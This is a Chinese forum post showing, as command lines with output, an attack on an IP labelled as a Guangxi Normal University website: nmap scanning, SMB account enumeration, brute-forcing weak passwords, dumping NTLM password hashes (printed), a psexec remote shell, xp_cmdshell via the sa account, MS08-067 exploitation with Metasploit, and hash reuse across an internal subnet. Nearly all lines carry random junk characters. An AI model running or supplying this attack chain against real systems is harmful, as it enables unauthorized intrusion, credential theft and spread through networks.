广西师范网站http://202.103.242.241/+ q9 z' ^# E, }, Y) Q- D. V" ]
$ ^$ \( q8 x( u! y, }% aroot@bt:~# nmap -sS -sV 202.103.242.241+ u' D8 y+ I- E# n6 I
% _0 f, ^/ \' L* EStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
. e, K. e. v8 J B; }' `& B/ }- W, J! K+ A
Nmap scan report for bogon (202.103.242.241)( g7 _8 n8 v( _# l
J5 ]2 z# w0 rHost is up (0.00048s latency).
# \6 |* m( p% r, g
* v1 g, z" P- i( U& O" j) D9 a7 XNot shown: 993 closed ports
) U" ?% D) m% o" j" k3 u+ ^& y* V- s9 b; V/ Q; w4 q- N1 {4 q
PORT STATE SERVICE VERSION
8 ?5 g u, m3 Y' k7 S! f. i. ]9 ]* u3 P# L. ?6 x
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
3 K7 X( ]; V2 Y3 y$ ~- _) P: M3 Y# p$ A8 @8 \/ I
139/tcp open netbios-ssn; m* w9 r* Q8 p% |5 s: Z
% L, q" Q; E7 q445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds. l, f3 C' k7 y8 v# R$ X
, K$ B* r0 K; P" D& y w
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)1 r: ?3 n3 x0 R4 V
- Q8 z, H! Y- f, M/ U1026/tcp open msrpc Microsoft Windows RPC* N- B0 |( Q6 p5 l/ U- G, M
1 X6 d0 ^ D# n; {* p$ J+ A3372/tcp open msdtc?
v! ?2 q' e7 V) _- _ f- a) [7 ~0 t2 \9 p
3389/tcp open ms-term-serv?
3 O) A7 |( ]5 }5 t% ?3 m1 t9 l( G
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
p" X$ M& E9 @0 {$ gSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
- B% j, V5 [! W1 \1 D% ?; G% ]3 @ \: o3 W
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
5 [7 N" z& ~; o7 @& U$ s. {3 D5 U/ r7 Q1 k
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”): v- D0 B3 s# b2 h. m9 x2 o; v) N8 B
# H9 E% b4 i' M# rSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO. I' _9 {+ N1 Y! j
" Z# _1 v( \9 D2 R
SF:ptions,6,”hO\n\x000Z”);
% f% P' B# {, ^( `
; ]7 T) Y( B; Q% x" `2 y- |MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
# W/ L( |5 ~1 P. q: ?
6 h2 z, T" w5 z: O2 t$ _. @# z; G" k( qService Info: OS: Windows
5 o" d9 l6 L$ N9 \+ y1 Q0 Q8 x- Q+ F' q, q* h; R4 x7 B5 i
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .9 ^% p) i; b: \1 L# \8 ? x
/ R/ J5 K4 O2 I' a8 p) }" \- e
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
9 {1 c. H+ K0 f# l7 [7 Q5 ^* j$ S% W3 K
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
6 T! C( C# E! T% R3 |% y1 X" W7 }2 [( ?9 v
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
1 h* @ R4 r' Y+ f9 o/ |
6 t9 s6 e% o5 ~* a* q6 h |5 M6 W-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
+ X) X$ h1 B j+ v# Q
, ?9 k4 d- S N- u6 j# h9 ?-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse/ f9 n7 q) V$ h/ A/ b) e0 n
; p0 k1 I' F, {! [-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
. D0 n. I( Y( k% i, z" j2 E( k& C/ X d. N0 y
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
1 S8 I0 v w3 W1 V# ~' q2 m- j
- v% H' A+ ]* [( ]. @% j-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse. h' a' P$ H- X9 ^. ~ i
1 e1 j: Z7 p8 ]9 |8 x
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse8 E7 Q+ d: ]8 }3 J# n
: J1 n2 m- J" G7 g& e-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse8 H, f0 ?/ V: O3 s
; g; f# [. B# u-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse8 V4 B; ~& @8 `9 T
0 u% V; M5 E% ]$ f% a/ U" t" R
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse6 r# g2 a% `/ d& z- E0 k
# J! j; C: D' A# _% F-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
! t9 {* a7 [ y
1 a9 j6 x) {$ k2 i6 L-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse$ A! x/ `0 |1 ]0 C! H+ T0 ?
+ b6 W! h: }& X0 `: R1 B. t
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
4 T! J0 k5 o9 p) c( u+ K6 ~0 i' u; {
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
- [6 } t! h8 z: r
0 p: R) p: a/ E0 N* a-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
4 U) I# \) |7 r' ^+ g3 [9 ~1 d/ Z' Q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
4 {% |5 R2 o) E. c2 V# V7 a
* _$ A; c% r+ O, { e* H//此乃使用脚本扫描远程机器所存在的账户名
& ]7 I$ l' t% h; p( H8 M* p9 K) g# l" b( {
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
5 M+ R( _. A3 _3 t6 Z9 ^% k6 C9 f0 @- _; s
Nmap scan report for bogon (202.103.242.241)
' Q" f7 @( u" Z/ N3 N9 z) @
! b! u7 c8 i. }1 z; I5 U# C4 y* nHost is up (0.00038s latency).
& M$ X1 T8 i" W' H8 T6 l
2 `$ o6 f, v! s' D& v* [. ZNot shown: 993 closed ports
) ^7 \2 [' ~1 ^$ t. X3 f- |8 N- ^6 C5 `" [$ B! y, D
PORT STATE SERVICE
( Q: i$ H- v3 @ W1 d5 V
" u9 j% ~1 O7 n3 G" A# G5 \4 @ ~+ a) Y" G135/tcp open msrpc5 [, O0 I- o+ [* u" Q1 @
$ v( v- u$ O) |% T3 n139/tcp open netbios-ssn
9 k! Q7 t$ T6 F/ E) L2 g- \; T" B# [* n5 ]/ S
445/tcp open microsoft-ds
, ?/ j; U( E$ o9 i* @8 X: R) R
0 a0 ]4 v T% u1025/tcp open NFS-or-IIS
" b9 s6 ~' u2 b% N# Y$ U
. V- ^ P# S/ q% ]9 j1026/tcp open LSA-or-nterm
( n! w' z- y5 W. Q: g. e w7 ]! y0 L K" o$ Q
3372/tcp open msdtc
* I2 [2 \& i. x" J+ t" U. T1 O: Q* ]; U% e
3389/tcp open ms-term-serv
2 q2 ^2 \4 r# U0 C- b' ], `) e K
0 C: n9 q3 w! XMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& p, k. j9 U7 @2 p+ U. N
1 h7 {6 b9 z u7 WHost script results:
3 v2 o5 }. n: h2 M. j
( B* j. b3 Y; x7 `8 T& l| smb-enum-users:
# x1 R% Q" W7 q! c" N
+ B) Y* n5 I5 F ~( X|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果" m) D2 w' z6 G- r M0 r
5 T# {0 n H% C dNmap done: 1 IP address (1 host up) scanned in 1.09 seconds- Z0 v( { A& \8 [, Q: \/ A
# E$ w& {3 N" A* o
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 3 i, h6 }1 {: B
, L0 \: n% a: l" P& Q//查看共享
1 b3 j, P/ s7 E3 g8 k ?$ e5 q
4 p' `. x. C E- f' tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST3 w5 y! Z$ Y/ l& e$ g2 J1 r, O
7 U4 I1 l% y* |5 x+ n' XNmap scan report for bogon (202.103.242.241)1 ?5 ~ y+ R, e
9 b+ e: H' s4 R% g: Z
Host is up (0.00035s latency).- a4 i3 s+ ~7 @0 H9 W# x# P! B
) a/ e5 E0 b+ w% ~& }! W
Not shown: 993 closed ports# A( x9 P. |& S: B+ U
. p: R: J R: @; I' T( e
PORT STATE SERVICE9 j E/ U; v, |( s6 u, R
2 g" ?$ u3 \3 K5 j' k' E* E' q
135/tcp open msrpc' U" Z9 f3 Y: H- |/ Q! G K/ }
+ o9 H8 |- L/ C" k& q# {5 u7 }
139/tcp open netbios-ssn
, O( B3 O5 C( k/ ^2 C8 x- z0 A9 x9 Q4 u) ~! O
445/tcp open microsoft-ds
# d7 b Z- w& E: Q4 r1 g z( b: T$ {0 F
1025/tcp open NFS-or-IIS
0 k9 J- l* e) q% F% e" s' _! ~# T0 s" f+ q4 I2 y
1026/tcp open LSA-or-nterm5 k4 s9 @2 }& B/ ]+ ?
* i8 J) l1 ]+ T% s* D' L2 ^% i3 a
3372/tcp open msdtc, P4 N; ~- V4 c; u" ?* \! i
4 j# L0 I m" p' t' n1 M& j0 g2 p+ V3389/tcp open ms-term-serv. x# f6 n/ j" V8 y* c& _
1 d% @" C# E. e; R
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 C0 q3 E1 o. k* F4 }' |' q2 L" L! {& y& o5 {. T7 Z
Host script results:4 Z3 h% x1 c& K
& j; b5 g, i+ Q! e$ [; j$ V
| smb-enum-shares:7 y' R9 o5 S2 r9 K
' @7 ^$ B0 B1 A- \% f
| ADMIN$
( B3 Y2 h: {/ E3 B# m! w6 G0 y; q9 U! _: c
| Anonymous access: <none>
+ ]$ A+ F! {$ S
' D% x, K' ]; X% n0 P| C$& J1 I L5 B$ E
i7 u$ U& e% i' n5 Y1 N
| Anonymous access: <none>5 t- I; l. u$ s# b% }1 G
8 U$ x7 o: y+ I ?
| IPC$
4 N0 Y3 A* Q/ Z1 f( i6 f( E# i }; M" k7 i d( _
|_ Anonymous access: READ5 q" H; J- S3 ^- A3 n
4 i- Y2 z, @5 j# P+ z6 O' e# YNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
$ d8 f# l7 S9 @1 j$ `7 O5 q3 u# t" _" }9 d0 B3 X2 e) C2 Q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 , j: l% g4 M2 i% r* \
- p8 ^4 j6 L" v8 Z+ s; \ n9 O; ^//获取用户密码 o5 N* Y- `5 i8 Z
$ P' Y$ K, n8 i7 I, O6 B& W% U7 ]9 B% VStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
# ?/ G& {6 _4 }" t$ {
7 S) I6 m9 J: W9 V6 FNmap scan report for bogon (202.103.242.2418)
6 W5 x) e" M% a' Y$ f% C8 U) y5 H9 e l3 K3 C8 B- c, i1 q
Host is up (0.00041s latency).0 O& o# _" k! W5 A
: {# \7 g3 u) V# o+ T* ]/ DNot shown: 993 closed ports
: G$ I% ~! Y, x. N5 N3 Q% l0 r! U5 A0 @$ v7 [+ g
PORT STATE SERVICE
7 S% F l6 ]. B4 k3 r. W' O
6 t* v; C% p" {0 `* u7 b! U4 t! e135/tcp open msrpc
7 u, C; v: U5 s# f2 _
0 L. T) T; r- c3 z" a* L5 ~139/tcp open netbios-ssn9 Y- W. o1 k P+ X
* G3 y! ?% p. A/ U; ?) V445/tcp open microsoft-ds
" H1 a. l S+ v# h8 B! P
4 w9 O v4 l# ]! [9 [1025/tcp open NFS-or-IIS
$ L0 \% m+ f6 o! \
$ A: X1 ~9 G* L2 K! G1026/tcp open LSA-or-nterm+ S: v0 ?! D4 _8 |+ W" Y% @+ | V
+ H. I! t$ d) m% U/ \
3372/tcp open msdtc
: l) y# Z& P$ D h' ]7 d3 E2 T8 [* G1 Q, C/ Z) G+ ?* l
3389/tcp open ms-term-serv" q9 e. U* T1 o
4 }8 [) s$ k7 e. k3 SMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: A/ O& W J( h& m- e& {; r" n% l" w: n) {" w6 L
Host script results:' n* I9 j6 R0 l+ f& s- ]# B
2 p7 v+ v# K4 U7 O" r# p/ ]- M| smb-brute:7 a- |% n# D- G/ |2 Q/ M# U$ w
6 t/ [+ D4 [8 e( L( ~" L
administrator:<blank> => Login was successful
?( Q7 m/ N$ h4 P6 c7 O' E3 x3 Q+ m' s
|_ test:123456 => Login was successful: T* O5 R3 L9 W3 P; E
; t7 s5 W* D7 lNmap done: 1 IP address (1 host up) scanned in 28.22 seconds' w0 f0 J; B7 h2 T7 E; `- @" ^
9 ~$ R# B- @1 Y
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
& [4 u- s* j! K7 b1 ^
' _* \5 b0 l4 {$ w. ?- Groot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data) j3 ^* {4 O8 r9 I! S
9 t5 G' f* y9 ^5 t# E% F6 ]8 sroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
; G6 c" B& v h* \+ P2 H3 D1 S/ e6 {- ]7 a" w7 L* s! y: x
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
2 y% W/ a, W7 C# Y' J9 P6 c; L, j6 f8 j6 C( _4 R
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST3 t9 y3 J7 F I8 E2 r3 u& S+ E
8 e: p7 b% ~/ g, T' | [
Nmap scan report for bogon (202.103.242.241)
0 I* @4 M% Y3 F7 E
6 _. r. W7 `. J: f4 y: DHost is up (0.0012s latency).- X3 {/ h3 e. X8 Y6 @; C* w3 F
9 ?- o. G2 g: k9 S9 }1 jPORT STATE SERVICE
6 u+ z1 H" ~' f# r6 N) H1 y5 r1 f
4 M5 A* ~% V. w( {3 V! Y135/tcp open msrpc
2 v" P% b3 Y) ?+ B2 f" W- o7 `* D
8 o& ^' Q Z; P7 b9 B! U% p139/tcp open netbios-ssn7 S _. L2 j, B
9 o3 T0 X# s! O. o; ?. K
445/tcp open microsoft-ds& N1 ^& M! @# G+ L- K; g
; p, t9 i' e+ R+ n* nMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) Y1 g# b6 y/ W6 P1 T: c2 s
4 v1 B2 D" C9 P N! ~) x/ f
Host script results:( s5 f. n# ^: {: b9 M" x. o' ]
' t! y; A( j7 p% g3 p# P3 F| smb-pwdump:/ B! N; h/ \; c: @" Y
; ~! r2 h( V, h+ O
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
: [" l6 }# t! c! y
- J' b/ [" T4 R$ g# I| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************7 U6 o" v0 h3 B0 p! _% s
; b5 w4 e- ^. {1 T) t
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
+ L6 b. M+ b* Q H9 R! n* x% D
7 t2 |, F6 c+ U|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2% y! V" L" ]4 R! `& F
R' }0 m% ]" j% gNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
! _5 e% V, i) a1 i/ n- K0 Q2 y2 Z
7 G" ^) @) u) ]2 v: \C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
: f" b7 e( D! S+ m) ~9 M
$ u. \+ L+ H. P: U-p 123456 -e cmd.exe
' s' r8 r1 S& t. L
6 W4 v/ r% L' M# [3 r5 D. zPsExec v1.55 – Execute processes remotely i+ L( `- T. _4 @* p5 D
% h P5 }* X# _
Copyright (C) 2001-2004 Mark Russinovich1 @( n0 b! z- h6 j
0 ?3 G1 t9 q5 d1 d# r1 d9 {" P
Sysinternals – www.sysinternals.com' j3 x+ Y% z5 k: ?
7 g) Y, q4 ^0 F* V+ j6 B
Microsoft Windows 2000 [Version 5.00.2195]* O+ ?: R( D# \$ h* X$ |( Y7 f$ l/ o- X
0 ~2 n# Z& M% p6 E# A7 I. }- Y& R. R
(C) 版权所有 1985-2000 Microsoft Corp.- ^* ]0 S5 I1 [1 \( b6 H
7 x9 N/ x6 b# U! P# m$ g
C:\WINNT\system32>ipconfig
: {1 k$ `2 D$ j
5 O" @8 M. b3 i7 _8 RWindows 2000 IP Configuration
9 K; ^: ^" D) R. a7 d0 ^" v/ P0 p( M6 e! X& {/ e$ J6 _( X2 u
Ethernet adapter 本地连接:
) G& w3 J6 [; R( }
4 H" c0 I; D! Z! V2 iConnection-specific DNS Suffix . :1 a. P9 w- Z6 Q9 V) h( R. ?
4 y6 n, i3 q2 l0 a# v
IP Address. . . . . . . . . . . . : 202.103.242.2416 {! ?7 n. R, J( X
/ H% _7 J% m. }1 N9 Z) y2 `Subnet Mask . . . . . . . . . . . : 255.255.255.05 b: n# V, E2 f2 }5 Y
% x( n3 U7 W% k9 [! wDefault Gateway . . . . . . . . . : 202.103.1.1
/ C3 Z4 R6 N) v$ P- K
. h7 q' c! D& ^+ N. fC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令4 T, j+ ^4 e& u, ]( E) A/ u: I
; M3 R8 C# P' {9 Droot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞6 h/ Y4 v; f5 H h+ j
: @5 i+ } s9 V# H% tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST1 u. P, X. w) H4 ]
3 y/ S) C: V/ `" I P1 kNmap scan report for bogon (202.103.242.241)4 w5 f) K4 f- J3 R' k
. x- `* q- y5 |* F$ N$ G/ iHost is up (0.00046s latency).
' n! j% l0 a* M3 ~8 v. {' Q9 _/ O. D) [# W1 J
Not shown: 993 closed ports& D4 B/ A9 \7 j: V; b6 U; x; n
8 D$ ^9 E. I' e9 G, e8 J
PORT STATE SERVICE
% r7 N0 X' _/ T6 K0 t, e3 y
, S7 z3 o2 _4 |' G2 p" p. r( W: p135/tcp open msrpc5 M2 }- b& ~! h, h& s" F+ W& e
# O% @( I, S! _- [
139/tcp open netbios-ssn
7 j1 V$ i4 B/ M0 x- @' H* G# [4 v X. R* {6 B
445/tcp open microsoft-ds
5 W0 Z; y% H! K! A3 Z7 O0 d2 s0 c) H2 C. P! ^4 E
1025/tcp open NFS-or-IIS! g3 b- N2 A5 \
' ] D: B* f+ d. q1026/tcp open LSA-or-nterm- a( I% r/ ?( W
' f! i, m5 p# ]3 O/ z. T2 a3372/tcp open msdtc* H+ a, J% t+ u1 _( g% C9 p& f F
Z" {8 I0 I8 D u5 E( a
3389/tcp open ms-term-serv, U% P9 J" D" E. _
+ P& f3 L& Z+ G2 G4 o) H' h; rMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! e1 \4 P5 C! Q, y1 A
$ n6 e( Z5 f$ g" b2 T4 N6 q
Host script results:& l E) ~) D8 _ O! J* {
# t' W" M% F, x% L) y| smb-check-vulns:' J6 U$ u! v" V( ^5 K8 ~* h
* o3 s- G0 W3 N9 U" {* V2 T: J8 r* D
|_ MS08-067: VULNERABLE
& B- F$ W5 d; w, B7 S) y" I4 D) z) I5 M! ~2 D. @! b6 ?9 Y
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds! t# f" H7 W7 f1 I3 L e0 i
8 W, |, O e5 S2 }( S0 H! Froot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
: }$ n: r2 a, M- r! O* D
) C. w6 h2 Z4 @. Y5 ymsf > search ms08! D! F2 ~. b' ~* P1 o
) c( n( C4 ~# k/ kmsf > use exploit/windows/smb/ms08_067_netapi
: m) H& `- x$ g9 j( [8 ~3 l( l. B8 r
, x) {; y/ j' k- V' pmsf exploit(ms08_067_netapi) > show options
2 y5 b. K% U. N3 P3 T6 O5 D. x4 P# \
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.2414 f3 o; h1 D" x. p
- l4 p" ]2 l: A3 O- u- R8 k
msf exploit(ms08_067_netapi) > show payloads
( y; N4 ?5 W: {! Y" I# b; e, V7 K0 R( p& |
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
+ G0 g( K; Y/ H4 c% q: K2 \ t* w: S" v. Q
msf exploit(ms08_067_netapi) > exploit3 O: e7 t9 V( v Z. }
+ g) Q6 r! j- d0 L
meterpreter >
. ?. D/ I2 y* B$ R
' H! ]) v+ v* j& x' F( x" v8 aBackground session 2? [y/N] (ctrl+z)
6 |, }4 Y1 r1 V" p5 O& E% {% W8 q
msf exploit(ms08_067_netapi) > sessions -l
# h7 ^2 B* Y& K+ w7 w7 D- J# L" I& X
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt* {! Z0 G8 b1 s- S& M" ]
% f) }' |8 A$ ~
test9 l$ o7 d; u4 Y$ \% f
/ ?- n- f& O4 c( B0 ]6 m
administrator
5 ~, e! M9 A! K8 Y" F/ l
0 P+ B0 f/ i4 Wroot@bt:/usr/local/share/nmap/scripts# vim password.txt
* u% @. h0 v" \( T' i" J' a G- `$ @0 Y
44EFCE164AB921CAAAD3B435B51404EE* q. M# [/ D# q: ~( u* N
& ~" ~" ~) S! K9 eroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 + A4 }' F' l5 i" W% d0 E
; y3 g, l K, N+ g( F2 u
//利用用户名跟获取的hash尝试对整段内网进行登录
5 B( l% P" \" a
6 t! R6 O" I5 [3 I2 ]4 k0 xNmap scan report for 192.168.1.1054 U! O9 X* y- \
5 W, \' W4 A$ f$ C# \ o9 N
Host is up (0.00088s latency).8 D+ d6 Q) b& i0 N9 A
: O; C* E8 \ r! |) ~! c, @' R
Not shown: 993 closed ports. K* {& O" Y( K& Q
# E4 g7 \% A2 x$ x: zPORT STATE SERVICE
* J% a; x) _, y# V! C r" w) Y3 R1 i. i' a/ A- V* p
135/tcp open msrpc
; J; M7 {0 W8 W' y& m8 C9 S* K+ }8 p( A# F% r, U% W
139/tcp open netbios-ssn
, V' Z0 z9 v: X$ M
8 b# j& i% Z9 w4 a- B6 ?5 H445/tcp open microsoft-ds. h) ]% W, y) o$ @
/ N7 s8 c2 o5 @; t2 R% l- H
1025/tcp open NFS-or-IIS
( w) B, y) e( ^& h- G1 _9 f7 R, ^4 C/ h
1026/tcp open LSA-or-nterm
: e* ~, {- j" D: c8 s$ ^2 A; A# z( h" Z
3372/tcp open msdtc8 d/ e" S" I0 x# t$ ~1 y( x7 O' d
! e5 v; ?& x& z/ D3389/tcp open ms-term-serv
/ A3 W' g' J' t5 n% z
5 c+ J/ E! r+ ?- WMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ B: f2 T6 R) h. v- {
" x# d/ l+ ^# f9 X. {
Host script results:
* p5 W/ h6 Q/ [# i- V1 l/ q% C- c
| smb-brute:
. g6 j6 t. |/ V" Z: Z- F# ]' _+ x' l2 c1 w' W$ ^% q* U
|_ administrator:<blank> => Login was successful; ^- o f4 n W- b" a) L* x
3 i4 B' }. k6 ^" E$ B; k攻击成功,一个简单的msf+nmap攻击~~·
) ^4 B7 B' d( t
/ c, G- l) P1 c0 T) W- s |
发表于 2012-12-4 12:46:42
收藏
支持
反对